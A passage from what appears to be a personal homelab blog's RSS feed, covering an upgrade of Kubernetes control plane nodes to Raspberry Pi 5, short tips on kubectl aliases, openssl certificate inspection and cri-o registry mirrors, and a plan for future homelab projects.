gone higher.</p>
<p>Looking at the temps on my deployed Pis, I didn&rsquo;t need to worry: The temps of
all three, running the k8s control plane, are around 52 - 55 C.
One more piece to note is the NVMe temp. There&rsquo;s zero airflow over it. I don&rsquo;t
gather the NVMe temps in my metrics, but I did a couple of spot checks, and the
temps were around 65 C. Well within the SSD&rsquo;s spec, but also something I need
to keep a closer eye on in the future. If push comes to shove, I can mount a
couple of large Noctua fans behind the Pis, and that should be enough, even at
low RPMs.</p>
<p>This concluded the testing, and the last thing remaining was to verify that
my Ansible playbooks worked against a Pi 5 without changes. And they did. Both
my image creation with HashiCorp&rsquo;s <a href="https://developer.hashicorp.com/packer">Packer</a>
and my main deployment playbook worked without any change, and booting the test
Pi off of the NVMe worked out of the box. The only change I had to make was to
add the PCIe Gen3 config to the Raspberry Pi play. It&rsquo;s very nice to see how
little changes I needed.</p>
<h2 id="deploying-the-pis">Deploying the Pis</h2>
<p>For the deployment of the Pis, I&rsquo;d set myself a somewhat complicated goal: I
wanted to keep using the host names of my current control plane hosts. Which made
the initial install more bothersome. But I decided against taking down the
original nodes first, because I didn&rsquo;t want to leave the cluster with only two
CP nodes during the new host&rsquo;s install, especially considering the instability that already existed.</p>
<p>So I had roughly the following steps:</p>
<ol>
<li>Boot new Pi from USB</li>
<li>Adapt boot order to put NVMe behind USB</li>
<li>Add a temporary entry with a temporary name in static DHCP</li>
<li>Generate image, but again with temporary hostname</li>
<li>Install image onto the NVMe SSD and reboot</li>
<li>Run full Ubuntu update, set root PW</li>
<li>Run full deployment Ansible playbook</li>
<li>Drain the old control plane node</li>
<li>Remove the old CP node from the Kubernetes cluster with <code>kubeadm reset</code>
and <code>kubectl delete node foo</code></li>
<li>Shutdown both nodes</li>
<li>Deploy new HW and remove old Pi 4</li>
<li>Update DHCP entry of old CP node with new Pi 5 MAC and remove temporary entry</li>
<li>Boot new node</li>
<li>Go into Ansible, set node name for new node and re-run deployment playbook, which also sets the hostname</li>
<li>Reboot new node</li>
<li>Add new node to k8s cluster as control plane</li>
</ol>
<p>In contrast to previous attempts of mine to switch control plane hosts, this one
went off without a hitch.</p>
<p>And since that moment, I did not have any spurious restarts of any control plane
Pods anymore. Not a single one. So problem solved. By throwing better hardware
at it. &#x1f601;</p>
<p>But before I end this post, here&rsquo;s two more plots. This one shows the CPU utilization
of one of the Pi 4 control plane nodes during a random day:
<figure>
    <img loading="lazy" src="pi4-cpu.png"
         alt="A screenshot of a Grafana time series plot. It shows 24h worth of CPU utilization. The utilization is very stable, with the host about 25% utilization, safe for a couple IOWAIT spikes down to 40%."/> <figcaption>
            <p>CPU utilization of a Pi 4 control plane node.</p>
        </figcaption>
</figure>

And here is a 24h plot of the same node, only now running on a Pi 5:
<figure>
    <img loading="lazy" src="pi5-cpu.png"
         alt="A screenshot of a Grafana time series plot. It shows 24h worth of CPU utilization. As in the previous screenshot, the utilization is pretty stable overall at about 12%. The previous IOWAIT spikes are gone now, and there are only two spikes to about 20% utilization."/> <figcaption>
            <p>CPU utilization of a Pi 5 control plane node.</p>
        </figcaption>
</figure>
</p>
<p>These plots show the more powerful Pi 5 CPU. They also indicate that the IOPS
issue is gone, as the Pi 5 plot doesn&rsquo;t have any IOWAIT spikes anymore.</p>
<p>I would have also loved to show a power consumption plot, but honestly, I don&rsquo;t
see any changes after switching to the Pi 5.</p>
<h2 id="conclusion">Conclusion</h2>
<p>This was a pretty nice project. It accomplished exactly what I had hoped, and
I didn&rsquo;t have any issues at all. Besides those PCIe cables. They almost drove my
entire Homelab into the arms of Hetzner.</p>
<p>Next up will be a post about migrating my Prometheus metrics storage to Thanos.</p>
<p>Re-reading the post and editing a bit, I should perhaps make the next project
a switch of my blog&rsquo;s theme. Those Grafana screenshots really are not very
readable. I need a theme which allows clicking on a figure and enlarging it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Sammelsurium I</title>
      <link>https://blog.mei-home.net/posts/sammelsurium-1/</link>
      <pubDate>Thu, 01 May 2025 23:50:19 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/sammelsurium-1/</guid>
      <description>A random mix of topics too small for their own posts but not ephemeral enough for a Fediverse post</description>
      <content:encoded><![CDATA[<p>Wherein I write down things that don&rsquo;t feel like they should be their own post.</p>
<p>My blogging notes are starting to really fill up with small topics I&rsquo;d like to
write about, but which don&rsquo;t feel like they warrant their own post. On the other
hand, they also don&rsquo;t feel ephemeral enough to just be a Fediverse post. So I
decided to introduce the Sammelsurium, which is the German word for a random
collection of things.</p>
<h2 id="setting-up-autocomplete-for-a-shell-alias">Setting up autocomplete for a shell alias</h2>
<p>Way back when I started my k8s experiments, I made the reasonable decision to
set up <code>k</code> as a bash alias for <code>kubectl</code>. Over the last 16 or so months that
must have saved me quite a lot of typing. The alias is as simple as they come:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>alias k<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;kubectl&#34;</span>
</span></span></code></pre></div><p>There&rsquo;s also a pretty extensive autocomplete. I&rsquo;ve deployed it into my bashrc
by first writing it out into a file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubectl completion bash &gt; ~/.kube/kubectl-comp
</span></span></code></pre></div><p>Then I source that file in my bashrc:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>source ~/.kube/kubectl-comp
</span></span></code></pre></div><p>So far, so nice. But the problem is now: This only works for <code>kubectl</code>, not for
my <code>k</code> alias!</p>
<p>To make it work for my alias as well, I had to add these lines to my bashrc:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#66d9ef">$(</span>type -t compopt<span style="color:#66d9ef">)</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;builtin&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    complete -o default -F __start_kubectl k
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    complete -o default -o nospace -F __start_kubectl k
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>Perhaps similarly useful, I&rsquo;ve also set up an alias for the <a href="https://github.com/rook/kubectl-rook-ceph">Rook Ceph</a>
kubectl plugin. This plugin needs to be told the cluster and operator namespaces.
As I&rsquo;ve only got one Rook Ceph cluster in my setup, those values never change,
so it doesn&rsquo;t make any sense to type them again and again. My alias looks like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>alias kceph<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;kubectl rook-ceph --operator-namespace rook-ceph -n rook-cluster&#34;</span>
</span></span></code></pre></div><h2 id="ceph-telemetry">Ceph telemetry</h2>
<p>Like to many projects these days, Ceph also has some <a href="https://docs.ceph.com/en/latest/mgr/telemetry/">telemetry function</a>.
It is opt-in, and the only bad thing I could say about it is that the project
asks you to enable it from time to time. I&rsquo;ve got it enabled. I&rsquo;ve always felt
that data sharing is a good way to help out a project.</p>
<p>But Ceph goes one step further. They also share some of the data in public
dashboards you can find <a href="https://telemetry-public.ceph.com/">here</a>.</p>
<p>The dashboard shows some general information, like the fact that there&rsquo;s about
3.5k Ceph clusters with telemetry enabled, which have a capacity of 1.73 EiB.
It also shows that an average cluster has about 16 - 32 TiB of storage and
has a mere 4 OSDs. I&rsquo;m wondering whether that&rsquo;s skewed by e.g. Proxmox clusters?</p>
<h2 id="showing-information-from-tls-certs-on-the-command-line">Showing information from TLS certs on the command line</h2>
<p>This one always comes up when I&rsquo;m updating my Let&rsquo;s Encrypt certs. I just want
to have a quick look at my webservers to make sure they&rsquo;ve all updated to the
new certificate correctly.</p>
<p>The command, using my blog as an example, looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ openssl s_client -connect blog.mei-home.net:443 2&gt;&amp;<span style="color:#ae81ff">1</span> | openssl x509 -text -noout
</span></span><span style="display:flex;"><span>Certificate:
</span></span><span style="display:flex;"><span>    Data:
</span></span><span style="display:flex;"><span>        Version: <span style="color:#ae81ff">3</span> <span style="color:#f92672">(</span>0x2<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>        Serial Number:
</span></span><span style="display:flex;"><span>            05:22:36:ee:6e:19:df:56:0a:ee:66:44:a3:fc:a3:00:8c:d7
</span></span><span style="display:flex;"><span>        Signature Algorithm: ecdsa-with-SHA384
</span></span><span style="display:flex;"><span>        Issuer: C<span style="color:#f92672">=</span>US, O<span style="color:#f92672">=</span>Let<span style="color:#960050;background-color:#1e0010">&#39;</span>s Encrypt, CN<span style="color:#f92672">=</span>E5
</span></span><span style="display:flex;"><span>        Validity
</span></span><span style="display:flex;"><span>            Not Before: Apr  <span style="color:#ae81ff">7</span> 08:53:40 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>            Not After : Jul  <span style="color:#ae81ff">6</span> 08:53:39 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>        Subject: CN<span style="color:#f92672">=</span>mei-home.net
</span></span><span style="display:flex;"><span>        Subject Public Key Info:
</span></span><span style="display:flex;"><span>            Public Key Algorithm: id-ecPublicKey
</span></span><span style="display:flex;"><span>                Public-Key: <span style="color:#f92672">(</span><span style="color:#ae81ff">384</span> bit<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                pub:
</span></span><span style="display:flex;"><span>                    04:6c:97:b7:bb:b1:26:cf:2f:c9:c8:14:65:a2:46:
</span></span><span style="display:flex;"><span>                    b6:4c:ab:a4:ea:47:57:29:cd:d4:3b:de:11:43:5d:
</span></span><span style="display:flex;"><span>                    69:a7:9f:be:50:50:81:41:b6:f6:97:a7:35:3a:13:
</span></span><span style="display:flex;"><span>                    4b:d1:a1:31:84:d0:e6:62:82:47:1f:97:d7:5d:ef:
</span></span><span style="display:flex;"><span>                    05:1d:5e:42:0d:f1:19:17:9f:59:d0:89:a3:ca:78:
</span></span><span style="display:flex;"><span>                    8a:d7:ed:a2:9f:d7:9c:32:15:92:f8:6d:ef:5a:7d:
</span></span><span style="display:flex;"><span>                    20:07:b8:c3:67:30:31
</span></span><span style="display:flex;"><span>                ASN1 OID: secp384r1
</span></span><span style="display:flex;"><span>                NIST CURVE: P-384
</span></span><span style="display:flex;"><span>        X509v3 extensions:
</span></span><span style="display:flex;"><span>            X509v3 Key Usage: critical
</span></span><span style="display:flex;"><span>                Digital Signature
</span></span><span style="display:flex;"><span>            X509v3 Extended Key Usage:
</span></span><span style="display:flex;"><span>                TLS Web Server Authentication, TLS Web Client Authentication
</span></span><span style="display:flex;"><span>            X509v3 Basic Constraints: critical
</span></span><span style="display:flex;"><span>                CA:FALSE
</span></span><span style="display:flex;"><span>            X509v3 Subject Key Identifier:
</span></span><span style="display:flex;"><span>                43:C0:F9:C3:C5:10:E4:F0:A5:68:AC:82:8E:7E:B4:D7:74:90:46:29
</span></span><span style="display:flex;"><span>            X509v3 Authority Key Identifier:
</span></span><span style="display:flex;"><span>                9F:2B:5F:CF:3C:21:4F:9D:04:B7:ED:2B:2C:C4:C6:70:8B:D2:D7:0D
</span></span><span style="display:flex;"><span>            Authority Information Access:
</span></span><span style="display:flex;"><span>                OCSP - URI:http://e5.o.lencr.org
</span></span><span style="display:flex;"><span>                CA Issuers - URI:http://e5.i.lencr.org/
</span></span><span style="display:flex;"><span>            X509v3 Subject Alternative Name:
</span></span><span style="display:flex;"><span>                DNS:*.mei-home.net, DNS:mei-home.net
</span></span><span style="display:flex;"><span>            X509v3 Certificate Policies:
</span></span><span style="display:flex;"><span>                Policy: 2.23.140.1.2.1
</span></span><span style="display:flex;"><span>            X509v3 CRL Distribution Points:
</span></span><span style="display:flex;"><span>                Full Name:
</span></span><span style="display:flex;"><span>                  URI:http://e5.c.lencr.org/88.crl
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>            CT Precertificate SCTs:
</span></span><span style="display:flex;"><span>                Signed Certificate Timestamp:
</span></span><span style="display:flex;"><span>                    Version   : v1 <span style="color:#f92672">(</span>0x0<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                    Log ID    : CC:FB:0F:6A:85:71:09:65:FE:95:9B:53:CE:E9:B2:7C:
</span></span><span style="display:flex;"><span>                                22:E9:85:5C:0D:97:8D:B6:A9:7E:54:C0:FE:4C:0D:B0
</span></span><span style="display:flex;"><span>                    Timestamp : Apr  <span style="color:#ae81ff">7</span> 09:52:10.214 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>                    Extensions: none
</span></span><span style="display:flex;"><span>                    Signature : ecdsa-with-SHA256
</span></span><span style="display:flex;"><span>                                30:45:02:20:47:88:12:84:60:3F:FB:62:7F:4C:A8:05:
</span></span><span style="display:flex;"><span>                                23:18:C5:25:66:1F:9A:13:58:8E:AD:94:DB:34:9E:C9:
</span></span><span style="display:flex;"><span>                                9D:F8:A2:07:02:21:00:83:76:32:B0:F7:34:11:B1:BB:
</span></span><span style="display:flex;"><span>                                EC:6A:2D:8C:B1:47:E6:93:DC:FE:31:3E:53:AE:67:47:
</span></span><span style="display:flex;"><span>                                08:B4:A3:38:5A:56:A0
</span></span><span style="display:flex;"><span>                Signed Certificate Timestamp:
</span></span><span style="display:flex;"><span>                    Version   : v1 <span style="color:#f92672">(</span>0x0<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                    Log ID    : DD:DC:CA:34:95:D7:E1:16:05:E7:95:32:FA:C7:9F:F8:
</span></span><span style="display:flex;"><span>                                3D:1C:50:DF:DB:00:3A:14:12:76:0A:2C:AC:BB:C8:2A
</span></span><span style="display:flex;"><span>                    Timestamp : Apr  <span style="color:#ae81ff">7</span> 09:52:12.253 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>                    Extensions: none
</span></span><span style="display:flex;"><span>                    Signature : ecdsa-with-SHA256
</span></span><span style="display:flex;"><span>                                30:44:02:20:03:29:9E:A8:29:43:3B:A9:44:EE:DB:60:
</span></span><span style="display:flex;"><span>                                70:E0:4A:9C:DB:DD:0C:9F:20:7D:7F:FB:DA:AF:90:FD:
</span></span><span style="display:flex;"><span>                                4E:EB:59:31:02:20:5B:84:2C:BC:05:A7:53:A4:EB:04:
</span></span><span style="display:flex;"><span>                                59:A4:7B:77:0E:5A:90:39:1B:68:BF:48:71:14:E5:16:
</span></span><span style="display:flex;"><span>                                72:42:89:55:76:95
</span></span><span style="display:flex;"><span>    Signature Algorithm: ecdsa-with-SHA384
</span></span><span style="display:flex;"><span>    Signature Value:
</span></span><span style="display:flex;"><span>        30:65:02:31:00:87:c9:85:13:1f:f7:b1:0a:d0:2d:0c:56:7f:
</span></span><span style="display:flex;"><span>        bd:1e:f5:51:2b:31:59:62:03:ee:bf:ca:fc:3f:09:b0:e4:e2:
</span></span><span style="display:flex;"><span>        74:80:aa:16:ac:1b:bf:17:38:3a:3a:22:6a:70:4c:57:e3:02:
</span></span><span style="display:flex;"><span>        30:1e:73:29:b1:e4:c4:43:a5:d8:bd:8f:81:a6:23:c6:10:b3:
</span></span><span style="display:flex;"><span>        cc:b0:3f:31:8b:86:f3:51:76:c8:85:b4:37:a2:be:96:e0:83:
</span></span><span style="display:flex;"><span>        61:65:cb:b8:6a:cd:d8:56:d7:7b:f4:a4:83
</span></span></code></pre></div><h2 id="excluding-containers-from-pull-through-cache-in-cri-o">Excluding containers from pull-through cache in cri-o</h2>
<p>I wrote about migrating to <a href="https://goharbor.io/">Harbor</a> during my k8s migration,
and about the fact that <a href="https://cri-o.io/">cri-o</a> supports pull-through caches
for any registry <a href="https://blog.mei-home.net/posts/k8s-migration-11-harbor/">in the past</a>.</p>
<p>I&rsquo;d like to provide a short update on the setup, namely on pull-through cache
setup. Because there&rsquo;s one tinsy problem with setting Harbor up as a generic
pull-through cache: Harbor itself. What if an important Harbor component gets
migrated during a node restart? And the Harbor images aren&rsquo;t available on the
new node - but Harbor is already down, so the cache doesn&rsquo;t work?</p>
<p>Well, first of all cri-o of course still works. If the cache doesn&rsquo;t work,
the original address is tried. But this seems to depend on what exactly doesn&rsquo;t
work. Namely, I ran into issues with my Dockerhub mirror, which runs through a
Caddy proxy. I described the reason in the blog post I linked above.</p>
<p>Well, luckily the cri-o team thought of that, and you can prevent specific
repositories from using the cache altogether. So now my config for DockerHub
looks like this:</p>
<pre tabindex="0"><code class="language-conf" data-lang="conf">[[registry]]
prefix = &#34;docker.io&#34;
insecure = false
blocked = false
location = &#34;docker.io&#34;
[[registry.mirror]]
location = internal.example.com/dockerhub-cache&#34;
[[registry]]
prefix = &#34;docker.io/goharbor&#34;
location = &#34;docker.io/goharbor&#34;
[[registry]]
prefix = &#34;docker.io/caddy&#34;
location = &#34;docker.io/caddy&#34;
</code></pre><p>This configuration redirects all DockerHub image pulls to my internal Harbor
instance by default. But specifically for Harbor&rsquo;s own images and for Caddy,
the redirection is overwritten to point to DockerHub again.
With this config I can be sure that Harbor itself can always pull its own images.</p>
<p>And that&rsquo;s already for my first Sammelsurium post. I think this a good format
for providing some short information I&rsquo;d like to put somewhere more permanent,
but don&rsquo;t want to write a full blog post about.</p>
]]></content:encoded>
    </item>
    <item>
      <title>What&#39;s next after the K8s Migration?</title>
      <link>https://blog.mei-home.net/posts/whats-next-after-k8s-migration/</link>
      <pubDate>Tue, 29 Apr 2025 22:00:30 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/whats-next-after-k8s-migration/</guid>
      <description>A meandering stream of thought about future Homelab projects</description>
      <content:encoded><![CDATA[<p>Wherein I go over my future plans for the Homelab, now that the k8s migration
is finally done.</p>
<p>So it&rsquo;s done. The <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration</a> is finally
complete, and I can now get started with some other projects. Or, well, I can
once I&rsquo;ve updated my control plane Pis to Pi 5 with NVMe SSDs.</p>
<p>But what to do then? As it turns out, I&rsquo;ve got a very full backlog. I&rsquo;m decidedly
not in danger of boredom.</p>
<p>Without further ado, here is a meandering tour through my Homelab project list.</p>
<h2 id="baremetal-improvements">Baremetal improvements</h2>
<p>At the moment, all of the hosts in my Homelab are running baremetal, I do not
have any VMs. I&rsquo;ve got both, x86 hosts and a lot of Pis. I&rsquo;ve also got hosts with
and without local storage. And their management, especially the creation of new
hosts, is not great at the moment.</p>
<p>In short, I&rsquo;m taking the current Ubuntu LTS and adapt the image for every single
host. I&rsquo;m using HashiCorp&rsquo;s <a href="https://developer.hashicorp.com/packer">packer</a>
for the generation of the images. This generation varies wildly between x86
and Pi hosts. For the x86 hosts, Packer runs the full Ubuntu installer in a Qemu VM, just in
an automated way. For the Pis, I&rsquo;m taking the preinstalled Ubuntu Pi images.
In both cases I then apply an Ansible playbook which installs basic necessities,
especially my management user with its SSH key and some preconditions for
Ansible usage. Importantly, this playbook also configures the host name. So I
need to generate a fresh image for every new host, even though the only difference
is the Linux hostname config.</p>
<p>What happens next depends on whether the host is netbooted or not. For netbooters,
I put the new image onto a Ceph RBD to serve as the host&rsquo;s root disk and extract
the boot partition to the NFS share used to mount the boot content to the hosts
themselves and my netboot control host, which runs dnsmasq to make the files available
to the netbooters.
For hosts with local storage, the approach is to stick in a USB stick, boot
the host, mount an NFS share with the freshly generated image, and then <code>dd</code> that
imagine onto the local disk.</p>
<p>All of the above is not really great, to be honest. There&rsquo;s a number of manual
steps in there. The first thing I&rsquo;d like to somehow solve is the &ldquo;one image per host&rdquo;.
That&rsquo;s only there because I need to provide the hostname in the image so it gets
the right one at first boot.
But that shouldn&rsquo;t be necessary. I should really only need two images,
one for Pis and one for x86 machines. And then I should do all the necessary
config via <a href="https://cloud-init.io/">Cloud-init</a>. This might even include some
parts of the config I&rsquo;m currently doing via the Ansible playbook. For example,
the creation of my management/Ansible user should also be possible with cloud-init.</p>
<p>But even if that works, there&rsquo;s still the actual install of the image on the
host, be it netbooted or local storage. And for this, I&rsquo;ve been eyeing two
tools for quite a while: <a href="https://tinkerbell.org/">tinkerbell</a> and Canonical&rsquo;s
<a href="https://maas.io/">MaaS (Metal as a Service)</a>. Both of those offer some kind of
management for baremetal machines, making use of DHCP and netboot. With this,
I&rsquo;d like to move my hosts a bit more in the direction of cattle.</p>
<p>Both Tinkerbell and MaaS are capable of automatically installing baremetal machines.
There are two issues with that when it comes to my setup, both related to my netbooters.
First, the Raspberry Pis. Those have a &ldquo;bespoke&rdquo; netboot process, that doesn&rsquo;t
really follow any standards. But both MaaS and Tinkerbell rely on a certain
pre-boot environment. And the Raspberry Pi can work with both - <em>if</em> you have
an SD card to provide separate bootcode. In principle, you need to UEFI boot the
Pi. And that, as said, works fine. But from everything I&rsquo;ve read up to now,
that approach always requires an SD card or some other local storage to work.
It doesn&rsquo;t work via the Pi&rsquo;s netboot process.
But then again - there&rsquo;s a lot of open source stuff even way down in the Pi&rsquo;s
boot process. And I think it could be very interesting to get really deeply into
the weeds here and implement an adapted Pi firmware myself. That would be a
really large project, because I&rsquo;ve got pretty much no idea about development
that close to the metal. But it could be really interesting.</p>
<p>The second problem is with the root disk on my netbooting hosts. They&rsquo;re Ceph RBDs,
and I had to implement some special scripting in the initramfs to make those work
as root disks. And I doubt that whatever OS install mechanisms Tinkerbell and
MaaS support can actually handle Ceph RBDs as the install target. But that&rsquo;s
another thing to check. Both tools are open source, so perhaps I can hack
something together.</p>
<p>With all of this, I might even make some proper contributions to open source
again, if what I come up with is actually fit for wider consumption.</p>
<p>For all of this to work, I will also need some sort of separate host, because
I don&rsquo;t think running the tools responsible for host definitions and configuration
on the k8s cluster that the managed hosts run is a great idea.
For stuff like that which should not rely on any other services in the Homelab,
I&rsquo;ve already got a host, what I call my &ldquo;cluster master&rdquo;. It&rsquo;s a Pi 4 and
currently runs my PowerDNS server and dnsmasq for supporting the netbooting
hosts. But that&rsquo;s only a 4GB Pi 4, so I can&rsquo;t run too much on there. But with
MaaS or Tinkerbell, I&rsquo;d not like to run it just in Docker containers or even
baremetal. Instead, I&rsquo;d like to set up a small management k8s cluster. I will
use that to also test some of the lighter/smaller k8s distributions, like
k3s. It will definitely be a single node cluster.</p>
<p>In addition to running Tinkerbell or MaaS on that cluster, I&rsquo;d also like to get
into Cluster API and ultimately see how I like <a href="https://www.talos.dev/">Talos Linux</a>.
I initially bounced off of it due to not allowing SSH access to the host, but
now that the number of things actually running baremetal is even smaller than
before, I&rsquo;m warming to the idea. And it&rsquo;s supposedly supporting Pi 4 already,
and they&rsquo;re working on Pi 5 support, from what I understand. So that could be
really nice to look at.</p>
<p>Furthermore, I&rsquo;ve also been looking at GitOps for the cluster with Flux or Argo,
and both would need some sort of management cluster as well.</p>
<p>So I&rsquo;ve got a lot of things to work on for the baremetal/hardware side of the
Homelab. One important thing I also need to do is to look into whether I want
to continue with the Pi fleet. The advantage is that I&rsquo;m getting a lot of
physical hosts with a relatively small physical footprint and very low
electricity consumption.
But this also comes with downsides. One I&rsquo;ve already mentioned above: Pis don&rsquo;t
always do things the standard way. They also don&rsquo;t have much expandability.
The standard advise today is to get some small form factor thin client from
Dell, Lenovo or HP from the used market. They have a similar expandability
problem, but at least they&rsquo;d have a more standardized boot process, and I
wouldn&rsquo;t need to worry about whether a given OS supports them - they&rsquo;re just
UEFI machines. But they&rsquo;re also 10x the size of a Pi 4. They also aren&rsquo;t passively
cooled, like all my Pis are. And my rack is sitting right next to my desk in my
living room. If I go this route, I will have to look for models which support me
putting in some nice Noctua instead of using whatever is already in there.
Following this path, I&rsquo;d probably put LXD (or rather, Incus) on the machines and
run everything in VMs, again using Ceph RBDs as their root disks, so that the
internal NVMe would also need to support the underlying system.</p>
<p>I&rsquo;m honestly talking myself into going that route right now. What&rsquo;s enticing
me the most is honestly the return to something &ldquo;standard&rdquo;. That&rsquo;s really
tempting. Not having to think about whether my underlying machines can even
support what I want to do with them would be nice.</p>
<p>But then again: The Pi 4 are still good. Sure, I have to replace the control
plane Pi 4 with Pi 5, but the worker nodes are still trucking along. And I would
guess that they will keep working for my needs for another couple of years, at
minimum. Replacing them now, and just for the reason that I&rsquo;d like to have
something more standardized, would be a massive waste.</p>
<h2 id="networking">Networking</h2>
<p>This is a really big one. At the moment, my entire network is 1 GbE. I&rsquo;ve got
a couple of hosts with 2.5 GbE cards, but all of my network infra is still only
1 GbE. I&rsquo;d like to change that. There&rsquo;s really nothing to be done with the Pis,
they&rsquo;re going to stay at 1 GbE. But, and this is the main thing, I&rsquo;ve got my
OPNsense router and my Ceph hosts as well as my desktop. The Ceph hosts would
be nice to have with 2.5 GbE or even more, so they could supply several 1 GbE
connected devices at their full speed.</p>
<p>So some new hardware will be in order. Preferably, I&rsquo;d like to have a switch
with mostly 1GbE ports. Though I&rsquo;d also be happy with 1/2.5 GbE combo ports. But
for some reason, 1 GbE/2.5 GbE ports don&rsquo;t seem to be widespread? I still remember
that 10/100/1000 ports were definitely a thing for a long time. I will then instead
be looking for two switches, most likely. One with enough 1 GbE ports for my Pis
and enough highspeed uplinks to connect to a second 2.5 GbE switch, perhaps
even more. I&rsquo;ve still got a lot of free PCIe ports in my Ceph machines for a
faster network card.
I&rsquo;m currently eyeing MikroTik for all my future networking hardware needs,
mostly to buy from a EU manufacturer.</p>
<p>Another network appliance I&rsquo;d like to upgrade is my current router. It has more
than enough performance, and the advantage of being quiet. But it&rsquo;s also a mini
PC, with the accompanying lack of expandability. It only has 1 GbE ports, so
even if I upgrade the switches, the connection to the router would still be a
significant bottleneck. For a replacement, I&rsquo;d love something 1U I can mount
into my rack. The main issue is of course the &ldquo;1U&rdquo; wish - because that, almost
invariably, comes with fans. And small diameter fans at that. And as I&rsquo;ve said
above, the rack is sitting next to my desk, so a bit of quiet is appreciated.
I&rsquo;d like to look at the machines that OPNsense themselves offer, as the smaller
once are looking pretty sweet. Or I could go and see whether anyone has made a
1U machine which is passively cooled. I mean, even 1U in a rack should provide
enough volume to put in enough metal to cool something reasonable in a passive
setup. But yeah, without that, I will likely give a bit of money to OPNsense
for one of their HW offerings.
Hm, just while doing my final read through the post, I&rsquo;m thinking that I
might not necessarily need to replace my router HW. It has six 1 GbE ports.
And I&rsquo;m only using two of them at the moment. Why not just look into combining
them? Sure, it would take up more ports in my future switch, but that might be
acceptable, if it means I can keep using the HW for longer.</p>
<p>Then there is another big elephant in the room - IPv6. I&rsquo;m currently reading
<a href="https://nostarch.com/tcpip.htm">The TCP/IP Guide</a>, and honestly, IPv6 sounds
pretty interesting. And at this point at least, most hardware and software I&rsquo;m
using should be perfectly fine with it.</p>
<p>And finally, I&rsquo;d like to fix two issues I&rsquo;ve currently got with my networking
setup. The first one has to do with using Cilium&rsquo;s LoadBalancer support via BGP.
It allows me to use LoadBalancer functionality in my cluster, and it does so via
publishing routes to virtual IPs pointing at the hosts running the service.
There&rsquo;s just one issue with that: If anything in the Homelab subnet needs to
access one of those LoadBalancer services, I end up with asymmetric routing.
The packets coming from the requesting host go up to the router, because the
LoadBalancer IPs are all in a separate subnet, so they need routing from the
Homelab subnet. But when the Pods send answers, those are not routed back via
the same path. Those packets are send via the k8s host&rsquo;s interface, because
that&rsquo;s directly connected to the Homelab network.
The main issue this introduces is for the stateful firewall I&rsquo;ve got running
on the router. Here, it&rsquo;s problematic that the router only sees one piece of
the initial TCP connection, but not the other side. By default, pf does not
consider that a valid connection, so it will block packets trying to flow along
it.
I had to configure &ldquo;sloppy state&rdquo; for those firewall rules, which made it work,
but it&rsquo;s still not great, because the first few packets flowing along the
path still get blocked.</p>
<p>The second issue is about my external DNS. It is currently hosted with my domain
registrar, Strato. Which is fine, there&rsquo;s only one issue I have with Strato: It
doesn&rsquo;t offer any sort of API for its DNS, besides some DynDNS support. So
some things, like the DNS challenge to get a wildcard cert from Let&rsquo;s Encrypt,
need manual intervention. Whenever I need to get a new cert, I need to log into
the Web UI to change the TXT records with the new challenge values. And I&rsquo;d
like to fully automate that.
One option is <a href="https://donotsta.re/users/dns">ServFail</a>. A DNS network with a
bash based Web UI is right down my alley. But before I can do that, I will have
to fix my mail delivery, because I currently depend on Strato&rsquo;s mail package,
which in turn depends on your DNS being hosted by them - or you entering the
correct data into your own DNS server.</p>
<h2 id="mail">Mail</h2>
<p>Speaking of mail, that is another big one I&rsquo;d like to tackle at some point.
Even though it&rsquo;s currently pretty far down the list. I did buy Michael W Lucas'
<a href="https://www.tiltedwindmillpress.com/product/ryoms/">Run Your Own Mail Server</a>
a little while ago and plan to use it to set up my very own. Let&rsquo;s see whether
it&rsquo;s really as simple as some people claim.</p>
<p>One important thing I need to do first though: Organizing a static IP.</p>
<h2 id="remote-vps-as-an-entrypoint-to-the-homelab">Remote VPS as an entrypoint to the Homelab</h2>
<p>At the moment, the entire Homelab actually runs at home. The DNS for this
blog and other public things I host point to my Deutsche Telekom consumer
VDSL connection. This has been working fine for all these years, but some things
require a static IP. Especially the aforementioned self-hosted mail server.
I&rsquo;m reasonably sure any residential sender of mails will be blocked immediately.
